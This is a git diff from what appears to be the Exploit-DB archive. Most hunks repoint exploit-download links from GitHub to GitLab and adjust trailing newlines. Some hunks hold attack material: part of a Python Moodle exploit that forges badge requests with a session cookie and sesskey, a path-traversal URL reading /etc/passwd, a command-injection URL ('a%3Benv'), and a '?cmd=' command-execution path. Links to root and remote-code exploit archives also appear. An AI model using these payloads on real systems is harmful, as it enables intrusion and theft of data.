OrderedDict([('badgeid', conf.badge_id), + ('add', '1'), + ('type', '6')]), + 'Host': {'Host': conf.parameters['Host']}, + 'Referer': {'Referer': '{app_root}/badges/criteria_settings.php'.format(app_root=app_root)}, - 'User-Agent': {'User-Agent': 'Mozilla/5.0 (Windows NT + 'User-Agent': {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 ' - '(KHTML, like Gecko) + '(KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36'}} - # we need to update values for the second request too - secondReq_url = ("id={badge_id}&activate=1&sesskey={sesskey}&" + # we need to update values for the second request too + secondReq_url = ("id={badge_id}&activate=1&sesskey={sesskey}&" "confirm=1&return=/badges/criteria.php?id={badge_id}".format(badge_id=conf.badge_id, sesskey=conf.sesskey)) - kb['secondReq'] = + kb['secondReq'] = ('{app_root}/badges/action.php'.format(app_root=app_root), 'POST', - secondReq_url, None, - (('Host', app_root.split('/')[2]), - ('Content-Type', 'application/x-www-form-urlencoded'), - ('Cookie', + secondReq_url, None, + (('Host', app_root.split('/')[2]), + ('Content-Type', 'application/x-www-form-urlencoded'), + ('Cookie', 'MoodleSession={}'.format(conf.s.cookies.get_dict()['MoodleSession'])), # yes, ugly - ('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) + ('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' - ' (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36'))) + ' (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36'))) - return payload \ No newline at end of file + return payload \ No newline at end of file diff --git a/exploits/php/webapps/6733.txt b/exploits/php/webapps/6733.txt index 7213168d8..376a8ecd5 100644 --- a/exploits/php/webapps/6733.txt +++ b/exploits/php/webapps/6733.txt @@ -15,4 +15,4 @@ http://localhost/mini-pub.php/front-end/cat.php?sFileName=/etc/passwd 3. command execution http://localhost/mini-pub.php/front-end/cat.php?sFileName=a%3Benv -# milw0rm.com [2008-10-12] +# milw0rm.com [2008-10-12] \ No newline at end of file diff --git a/exploits/php/webapps/697.c b/exploits/php/webapps/697.c index 567ddde98..82c236893 100644 --- a/exploits/php/webapps/697.c +++ b/exploits/php/webapps/697.c @@ -1,4 +1,4 @@ -// Compiled version: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/697.rar (phpbbmemorydump.rar) +// Compiled version: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/697.rar (phpbbmemorydump.rar) // Source serv.cpp is at the bottom of the page - str0ke // Notes from author: diff --git a/exploits/php/webapps/7421.txt b/exploits/php/webapps/7421.txt index 9b13d731c..bcdad202c 100644 --- a/exploits/php/webapps/7421.txt +++ b/exploits/php/webapps/7421.txt @@ -21,6 +21,6 @@ [+] For OS Commanding executing go to: http://127.0.0.1/ezinfo/about?cmd=<OScommand> */ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/7421.zip (2008-eZPublish_abuse_of_functionality_zero_day.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/7421.zip (2008-eZPublish_abuse_of_functionality_zero_day.zip) # milw0rm.com [2008-12-11] \ No newline at end of file diff --git a/exploits/php/webapps/897.cpp b/exploits/php/webapps/897.cpp index 3cfc2a5a0..4356dce90 100644 --- a/exploits/php/webapps/897.cpp +++ b/exploits/php/webapps/897.cpp @@ -1,5 +1,5 @@ /* Paisterist's code was nice but heres mil's version. - * precompiled: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/897.rar + * precompiled: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/897.rar * Usage: * bcc32 897.cpp * and place the exe in your firefox profile dir. diff --git a/exploits/php/webapps/9835.txt b/exploits/php/webapps/9835.txt index 6c54a8e9f..044cf71fd 100644 --- a/exploits/php/webapps/9835.txt +++ b/exploits/php/webapps/9835.txt @@ -27,6 +27,4 @@ #=========================================================== ################################################################# # Securitylab Security Research Team -################################################################### - - +################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/9839.txt b/exploits/php/webapps/9839.txt index 977baae20..264de43bf 100644 --- a/exploits/php/webapps/9839.txt +++ b/exploits/php/webapps/9839.txt @@ -18,4 +18,4 @@ thenqyu : IndonesianCoder.SurabayaHackerLink.ServerIsDown.Kill-9 Don Tukulesto.KaMtiEz.Vyc0d.Arianom.Denbayan.mistersaint gonzhack.cyb3r_tr0n.m364tr0n. YogyaCarderLink.v3n0m -############################################################# +############################################################# \ No newline at end of file diff --git a/exploits/php/webapps/9840.txt b/exploits/php/webapps/9840.txt index 3459740c4..86631df42 100644 --- a/exploits/php/webapps/9840.txt +++ b/exploits/php/webapps/9840.txt @@ -18,4 +18,4 @@ thenqyu : IndonesianCoder.SurabayaHackerLink.ServerIsDown.Kill-9 Don Tukulesto.KaMtiEz.Vyc0d.Arianom.Denbayan.mistersaint gonzhack.cyb3r_tr0n.m364tr0n. YogyaCarderLink.v3n0m -############################################################# +############################################################# \ No newline at end of file diff --git a/exploits/php/webapps/9880.txt b/exploits/php/webapps/9880.txt index 7b01ef264..e5c97dade 100644 --- a/exploits/php/webapps/9880.txt +++ b/exploits/php/webapps/9880.txt @@ -19,13 +19,4 @@ # [*] Greetz: Elemento_pcx - z4i0n - D3UX - m4v3rick - HADES - Hualdo - Vympel - sp3x ! [*] Made in Brazil -[*] Reference: http://securityreason.com/exploitalert/7435 - - - - - - - - - +[*] Reference: http://securityreason.com/exploitalert/7435 \ No newline at end of file diff --git a/exploits/php/webapps/9922.txt b/exploits/php/webapps/9922.txt index a118458d2..f392a63e5 100644 --- a/exploits/php/webapps/9922.txt +++ b/exploits/php/webapps/9922.txt @@ -40,7 +40,4 @@ # - sp3x # -[0]Reference: http://securityreason.com/exploitalert/7422 - - - +[0]Reference: http://securityreason.com/exploitalert/7422 \ No newline at end of file diff --git a/exploits/python/webapps/43021.py b/exploits/python/webapps/43021.py index 34ea9e9e0..a4f8912ca 100755 --- a/exploits/python/webapps/43021.py +++ b/exploits/python/webapps/43021.py @@ -206,6 +206,4 @@ Update to 1.2.8p26. 10. REFERENCES ============= [0] https://www.rcesecurity.com/2017/10/cve-2017-14955-win-a-race-against-check-mk-to-dump-all-your-login-data/ -[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14955 - - +[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14955 \ No newline at end of file diff --git a/exploits/python/webapps/47879.md b/exploits/python/webapps/47879.md index 708bcf70c..20d61b3ef 100644 --- a/exploits/python/webapps/47879.md +++ b/exploits/python/webapps/47879.md @@ -1,4 +1,4 @@ -EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47879.zip +EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47879.zip # django_cve_2019_19844_poc diff --git a/exploits/solaris/dos/28911.txt b/exploits/solaris/dos/28911.txt index 3c15f902a..e5bf05e73 100644 --- a/exploits/solaris/dos/28911.txt +++ b/exploits/solaris/dos/28911.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to crash the affected computer, denying servi Solaris 10 on the ia32/x86 architecture has been reported vulnerable; previous versions may be affected as well, but Symantec has not confirmed this. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28911.img.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28911.img.gz \ No newline at end of file diff --git a/exploits/solaris/local/23874.txt b/exploits/solaris/local/23874.txt index 544ff8973..b4fcff9da 100644 --- a/exploits/solaris/local/23874.txt +++ b/exploits/solaris/local/23874.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/9962/info It has been reported that Sun Solaris may be prone to a local privilege escalation vulnerability that may allow an attacker to gain root access to a vulnerable system. The issue exists due to insufficient sanitization of user-supplied data via the vfs_getvfssw() function in the Solaris kernel. An attacker can load a user-specified kernel module by using directory traversal sequences and employing the mount() or sysfs() system calls. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23874.tar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23874.tar \ No newline at end of file diff --git a/exploits/solaris/remote/19696.c b/exploits/solaris/remote/19696.c index 58788857b..dc1bc4a59 100644 --- a/exploits/solaris/remote/19696.c +++ b/exploits/solaris/remote/19696.c @@ -107,4 +107,4 @@ int aux; free(buf); -} +} \ No newline at end of file diff --git a/exploits/solaris/remote/21097.txt b/exploits/solaris/remote/21097.txt index 313af9b76..5e9cf440e 100644 --- a/exploits/solaris/remote/21097.txt +++ b/exploits/solaris/remote/21097.txt @@ -12,4 +12,4 @@ This vulnerability is very similar to one mentioned in NAI advisory NAI-0020. NOTE: It has been reported that a valid printer does NOT need to be configured to exploit this vulnerability. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21097.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21097.tar.gz \ No newline at end of file diff --git a/exploits/solaris/remote/5282.txt b/exploits/solaris/remote/5282.txt index 2f99aad2a..f5ab9a64e 100644 --- a/exploits/solaris/remote/5282.txt +++ b/exploits/solaris/remote/5282.txt @@ -1,5 +1,5 @@ Sun Solaris <= 10 rpc.ypupdated Remote Root Exploit -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5282.tar.gz (2008-ypk2008.tar.gz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5282.tar.gz (2008-ypk2008.tar.gz) # milw0rm.com [2008-03-20] \ No newline at end of file diff --git a/exploits/unix/dos/20376.txt b/exploits/unix/dos/20376.txt index 1d1856123..ce6889135 100644 --- a/exploits/unix/dos/20376.txt +++ b/exploits/unix/dos/20376.txt @@ -12,4 +12,4 @@ Because it allows a malicious local user to register rpc programs on the server, Note that, in addition to the platforms listed as vulnerable, others have not been test and may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20376.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20376.tgz \ No newline at end of file diff --git a/exploits/unix/local/19904.txt b/exploits/unix/local/19904.txt index d704eeeb8..78d940b61 100644 --- a/exploits/unix/local/19904.txt +++ b/exploits/unix/local/19904.txt @@ -5,4 +5,4 @@ This password, which grants access to the 'wizard' mode of the device, is derive This password can be utilized from the admin console locally (via a serial interface) or remotely if the machine has been deployed with a modem for remote access. With this password an intruder gains shell access to the underlying UNIX system and may sniff traffic, among other things. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19904.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19904.tar.gz \ No newline at end of file diff --git a/exploits/unix/remote/19722.txt b/exploits/unix/remote/19722.txt index a5dba77aa..993b8a99e 100644 --- a/exploits/unix/remote/19722.txt +++ b/exploits/unix/remote/19722.txt @@ -8,4 +8,4 @@ It is also possible for a local user to pass arguments to sendmail, through the By exploiting multiple vulnerabilities in lpd, it may be possible for a remote attacker to gain root privileges on a target server. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19722.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19722.tgz \ No newline at end of file diff --git a/exploits/unix/remote/20512.txt b/exploits/unix/remote/20512.txt index 69405819b..4c3b47cd1 100644 --- a/exploits/unix/remote/20512.txt +++ b/exploits/unix/remote/20512.txt @@ -14,4 +14,4 @@ This vulnerability can be exploited on systems supporting anonymous ftp if a wri It should noted that OpenBSD ships with ftp disabled, though it is an extremely commonly used service. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20512.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20512.tar.gz \ No newline at end of file diff --git a/exploits/unix/remote/20879.txt b/exploits/unix/remote/20879.txt index 2984f2106..f87e523c5 100644 --- a/exploits/unix/remote/20879.txt +++ b/exploits/unix/remote/20879.txt @@ -4,4 +4,4 @@ The rpc.yppasswdd server is used to handle password change requests from yppassw A buffer overrun vulnerability has been discovered in the rpc.yppasswdd utility distributed by multiple vendors. The problem occurs due to insufficient bounds checking before copying remotely-supplied user information into a static memory buffer. As a result, a malicious user may be capable of exploiting this issue to overwrite sensitive locations in memory and thus execute arbitrary code with superuser privileges. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20879.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20879.tar.gz \ No newline at end of file diff --git a/exploits/unix/remote/21314.txt b/exploits/unix/remote/21314.txt index b43563c0a..0bf621781 100644 --- a/exploits/unix/remote/21314.txt +++ b/exploits/unix/remote/21314.txt @@ -6,4 +6,4 @@ A vulnerability has been announced in some versions of OpenSSH. An off-by-one er Administrators should assume that this can be exploited without authentication and should patch vulnerable versions immediately. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21314.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21314.tgz \ No newline at end of file diff --git a/exploits/unix/remote/21574.txt b/exploits/unix/remote/21574.txt index 40cc90d43..0b9c64566 100644 --- a/exploits/unix/remote/21574.txt +++ b/exploits/unix/remote/21574.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/5079/info Pirch is subject to a buffer overflow condition. The overrun occurs if a user receives on a maliciously constructed link. It is not confirmed whether the user must first click on the link or not. This issue is the result of inadequate bounds checking on externally supplied data. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21574.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21574.zip \ No newline at end of file diff --git a/exploits/unix/remote/21579.txt b/exploits/unix/remote/21579.txt index 68d08cfdf..80658921a 100644 --- a/exploits/unix/remote/21579.txt +++ b/exploits/unix/remote/21579.txt @@ -15,4 +15,4 @@ Proof-of-concept code has been made public. Users are advised to upgrade immedia **UPDATE: One of these issues is trivially exploitable and is still present in OpenSSH 3.5p1 and 3.4p1. Although these reports have not been confirmed, administrators are advised to implement the OpenSSH privilege-separation feature as a workaround. BSD administrators are also advised to upgrade to the newest kernel versions because recently patched vulnerabilities may allow root compromise despite the use of the privilege-separation feature. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21579.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21579.tar.gz \ No newline at end of file diff --git a/exploits/unix/remote/22085.txt b/exploits/unix/remote/22085.txt index df6b28499..b22894347 100644 --- a/exploits/unix/remote/22085.txt +++ b/exploits/unix/remote/22085.txt @@ -6,4 +6,4 @@ Due to a lack of sufficient bounds checking for client responses to password aut It is believed the attacker must be able to issue a COM_CHANGE_USER command to exploit this issue, so having access to a valid database user account may be a prerequisite for exploitation. It is not known if this condition exists when an unauthenticated user attempts to authenticate normally. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22085.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22085.tgz \ No newline at end of file diff --git a/exploits/unix/remote/22471.txt b/exploits/unix/remote/22471.txt index 8833c99d4..44e22c72f 100644 --- a/exploits/unix/remote/22471.txt +++ b/exploits/unix/remote/22471.txt @@ -6,4 +6,4 @@ Successful exploitation of this issue could allow an attacker to execute arbitra It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samba-TNG 0.3.1 and earlier are also affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22471.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22471.tar.gz \ No newline at end of file diff --git a/exploits/unix/remote/24067.c b/exploits/unix/remote/24067.c index 2d4debdf0..262b13dde 100644 --- a/exploits/unix/remote/24067.c +++ b/exploits/unix/remote/24067.c @@ -159,8 +159,4 @@ int main(int argc, char *argv[]) } -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24067.lha - - - - +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24067.lha \ No newline at end of file diff --git a/exploits/unix/remote/25625.c b/exploits/unix/remote/25625.c index 8e5909c6e..5b8f15fa8 100644 --- a/exploits/unix/remote/25625.c +++ b/exploits/unix/remote/25625.c @@ -119,7 +119,4 @@ void changeport(char *code, int port, int offset) { /* Assume Little-Endianess.... */ *ptr++=(char)((port>>8)&0xff); *ptr++=(char)(port&0xff); -} - - - +} \ No newline at end of file diff --git a/exploits/unix/remote/27992.txt b/exploits/unix/remote/27992.txt index 44841bc62..749ab5115 100644 --- a/exploits/unix/remote/27992.txt +++ b/exploits/unix/remote/27992.txt @@ -6,4 +6,4 @@ This issue allows remote attackers to execute arbitrary machine code in the cont FreeType versions prior to 2.2.1 are vulnerable to this issue. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27992.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27992.zip \ No newline at end of file diff --git a/exploits/unix/remote/32811.txt b/exploits/unix/remote/32811.txt index f386011c4..7543eebe5 100644 --- a/exploits/unix/remote/32811.txt +++ b/exploits/unix/remote/32811.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary code with the privileges Versions prior to Flash Player 10.0.12.36 are vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32811.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32811.rar \ No newline at end of file diff --git a/exploits/unix/remote/40347.txt b/exploits/unix/remote/40347.txt index 960b376a6..6c6c88e67 100644 --- a/exploits/unix/remote/40347.txt +++ b/exploits/unix/remote/40347.txt @@ -441,4 +441,4 @@ they receive the CLIENT_HELLO packet. openssl-scanner reports this as http://www.phreedom.org/solar/exploits/apache-openssl/openssl-too-open.tar.gz -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40347.tar.gz (openssl-too-open.tar.gz) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40347.tar.gz (openssl-too-open.tar.gz) \ No newline at end of file diff --git a/exploits/watchos/dos/47158.txt b/exploits/watchos/dos/47158.txt index 968f3f689..3dcc481b4 100644 --- a/exploits/watchos/dos/47158.txt +++ b/exploits/watchos/dos/47158.txt @@ -15,4 +15,4 @@ I've also attached a crash dump and ETencode.m, which is the file that was used Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47158.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47158.zip \ No newline at end of file diff --git a/exploits/windows/dos/10204.txt b/exploits/windows/dos/10204.txt index fc8491605..9eb7b258d 100644 --- a/exploits/windows/dos/10204.txt +++ b/exploits/windows/dos/10204.txt @@ -14,4 +14,4 @@ Foxit Reader is prone to a remote code-execution vulnerability because is fails An attacker can exploit this issue by supplying a malicious PDF file or webpage. Successful exploits may allow the attacker to execute arbitrary code in the context of a user running the affected application. Failed attempts will likely result in denial-of-service conditions. -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/10204.tar (2009-11-22-36668.tar) \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/10204.tar (2009-11-22-36668.tar) \ No newline at end of file diff --git a/exploits/windows/dos/10208.txt b/exploits/windows/dos/10208.txt index 128ae5cac..415c2c0a3 100644 --- a/exploits/windows/dos/10208.txt +++ b/exploits/windows/dos/10208.txt @@ -2,4 +2,4 @@ Adobe Reader and Acrobat 9.x before 9.2, 8.x before 8.1.7, and possibly 7.x thro attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via unspecified vectors. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/10208.tgz (2009-11-22-memcorrupt.tgz) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/10208.tgz (2009-11-22-memcorrupt.tgz) \ No newline at end of file diff --git a/exploits/windows/dos/10343.txt b/exploits/windows/dos/10343.txt index 65d54bcee..b55ef80ef 100644 --- a/exploits/windows/dos/10343.txt +++ b/exploits/windows/dos/10343.txt @@ -101,10 +101,10 @@ Some malicious user can use is to create a DoS condition on a server or workstat The PoC Files can be download here. Hang CPU -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/10343-1.arj (PRL_CPU_Hang.arj) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/10343-1.arj (PRL_CPU_Hang.arj) Crash Application -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/10343-2.cab (PRL_Crash.cab) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/10343-2.cab (PRL_Crash.cab) ##################################################################################### diff --git a/exploits/windows/dos/11062.txt b/exploits/windows/dos/11062.txt index 6f4a9cec3..46cc8a92a 100644 --- a/exploits/windows/dos/11062.txt +++ b/exploits/windows/dos/11062.txt @@ -5,4 +5,4 @@ # Code : -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11062.zip (sopcast_exp.zip) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11062.zip (sopcast_exp.zip) \ No newline at end of file diff --git a/exploits/windows/dos/11064.txt b/exploits/windows/dos/11064.txt index 542fd9cf3..31edaf162 100644 --- a/exploits/windows/dos/11064.txt +++ b/exploits/windows/dos/11064.txt @@ -4,4 +4,4 @@ # Tested on: xpsp3 ie6 # Code : -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11064.zip (uusee.zip) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11064.zip (uusee.zip) \ No newline at end of file diff --git a/exploits/windows/dos/11149.c b/exploits/windows/dos/11149.c index 7d055d586..35e007d98 100644 --- a/exploits/windows/dos/11149.c +++ b/exploits/windows/dos/11149.c @@ -96,4 +96,4 @@ void print(char* msg) { printf("\n[*]%s\n",msg); - } + } \ No newline at end of file diff --git a/exploits/windows/dos/11176.txt b/exploits/windows/dos/11176.txt index 2da66e67a..1c3877ff2 100644 --- a/exploits/windows/dos/11176.txt +++ b/exploits/windows/dos/11176.txt @@ -5,4 +5,4 @@ # I exposed this vunl two weeks ago,are you really responsible for # the security of millions users? # Code : -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11176.zip (Xunlei_XPPlayer_ActiveX_Remote_Exec_0day_POC.zip) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11176.zip (Xunlei_XPPlayer_ActiveX_Remote_Exec_0day_POC.zip) \ No newline at end of file diff --git a/exploits/windows/dos/11182.txt b/exploits/windows/dos/11182.txt index 4f89b812c..5ad0db536 100644 --- a/exploits/windows/dos/11182.txt +++ b/exploits/windows/dos/11182.txt @@ -1,7 +1,7 @@ # Version: 6/7/8 # Tested on: Windows XP SP3 English & Windows 7 # CVE : -# Code: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11182.tar.gz (ie_crash.tar.gz) +# Code: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11182.tar.gz (ie_crash.tar.gz) Description: Modified 1360. byte to 44, 1361. to 43, 1362. 42, 1363. byte to 41 of a sample swf file, ran it and crash occurred. diff --git a/exploits/windows/dos/11192.txt b/exploits/windows/dos/11192.txt index bee724c42..8b7056956 100644 --- a/exploits/windows/dos/11192.txt +++ b/exploits/windows/dos/11192.txt @@ -20,7 +20,7 @@ Opening a malformed ".slk" file with Openoffice, causes a crash on PoC: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11192.rar (slk.rar) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11192.rar (slk.rar) Credits: karak0rsan and murderkey from Hellcode Research diff --git a/exploits/windows/dos/11245.txt b/exploits/windows/dos/11245.txt index ea631487c..323ade649 100644 --- a/exploits/windows/dos/11245.txt +++ b/exploits/windows/dos/11245.txt @@ -10,4 +10,4 @@ This same bug was in early version of firfox,found by (Wojciech Pawlikowski) Thi This vulnerability cause a denial of service (memory corruption) via an XML document composed of a long series of start-tags with no corresponding end-tags. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11245.rar (Firefox-v3.6_PoC.rar) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11245.rar (Firefox-v3.6_PoC.rar) \ No newline at end of file diff --git a/exploits/windows/dos/11247.txt b/exploits/windows/dos/11247.txt index 801600e67..b42673959 100644 --- a/exploits/windows/dos/11247.txt +++ b/exploits/windows/dos/11247.txt @@ -9,4 +9,4 @@ after opening the opera.html broswer hang for a while and crush.same bug in fire This vulnerability cause a denial of service (memory corruption) via an XML document composed of a long series of start-tags with no corresponding end-tags. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11247.rar (Opera_10.10-PoC.rar) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11247.rar (Opera_10.10-PoC.rar) \ No newline at end of file diff --git a/exploits/windows/dos/11342.txt b/exploits/windows/dos/11342.txt index 92735a48c..f29bf4e31 100644 --- a/exploits/windows/dos/11342.txt +++ b/exploits/windows/dos/11342.txt @@ -3,4 +3,4 @@ # Tested on: Windows XP SP2/SP3 (x86), Vista (x86), Windows 7 (x64) # Code : A specially crafted SQL file query can cause the the application to freeze and finally crash. The bug is the SQL query processor engine, it can't handle malformed SQL queries leading to crash. -# PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11342.tar.gz (sqlite_browser_db_poc.tar.gz) \ No newline at end of file +# PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11342.tar.gz (sqlite_browser_db_poc.tar.gz) \ No newline at end of file diff --git a/exploits/windows/dos/11632.txt b/exploits/windows/dos/11632.txt index cf3c4e7a1..1fd1e79a4 100644 --- a/exploits/windows/dos/11632.txt +++ b/exploits/windows/dos/11632.txt @@ -1,7 +1,7 @@ When Orb is first installed it registers several Direct Show filters with the system. When registered these filters are then called whenever a file which has a dependency on such a required filter is accessed. By specially crafting specific headers embedded into an mp3 file we can create a direct code path to code which is vulnerable to a integer division by zero. This vulnerability can be triggered remotely be embedding the crafted mp3 file into HTML. It is also not dependent on a certain media player. Attached is a PoC (Proof-Of-Concept) I wrote for this specific bug. Also included is a Rebuild file for IDA Pro examining the crash. Download POC: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11632.zip (aac_parser_int_div_by_0_orb.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11632.zip (aac_parser_int_div_by_0_orb.zip) Timeline: diff --git a/exploits/windows/dos/11639.txt b/exploits/windows/dos/11639.txt index b4d8b11bf..52c94b27b 100644 --- a/exploits/windows/dos/11639.txt +++ b/exploits/windows/dos/11639.txt @@ -14,4 +14,4 @@ Chrome will through up the "Aw, Snap!" Know your enemy -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11639.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11639.zip \ No newline at end of file diff --git a/exploits/windows/dos/11803.txt b/exploits/windows/dos/11803.txt index fe89177c2..cceccb3cc 100644 --- a/exploits/windows/dos/11803.txt +++ b/exploits/windows/dos/11803.txt @@ -5,7 +5,7 @@ Successful exploitation of this vulnerability allows an attacker to execute arbi This vulnerability is confirmed in Crimson Editor version 3.70. A PoC configuration file can be downloaded here: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11803.zip (cedt.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11803.zip (cedt.zip) Ref: diff --git a/exploits/windows/dos/12080.txt b/exploits/windows/dos/12080.txt index cfd8ddf81..239679868 100644 --- a/exploits/windows/dos/12080.txt +++ b/exploits/windows/dos/12080.txt @@ -19,7 +19,7 @@ DoS("DoS"); ------------------------- -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/12080.pdf +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/12080.pdf Regards diff --git a/exploits/windows/dos/13872.txt b/exploits/windows/dos/13872.txt index dfeef568a..5e52076f2 100644 --- a/exploits/windows/dos/13872.txt +++ b/exploits/windows/dos/13872.txt @@ -7,4 +7,4 @@ Code was generated utilizing a custom fuzzer, PoC creates an Access Violation when writing to memory. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/13872.pdf (SumatraPDF1.1DOS.pdf) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/13872.pdf 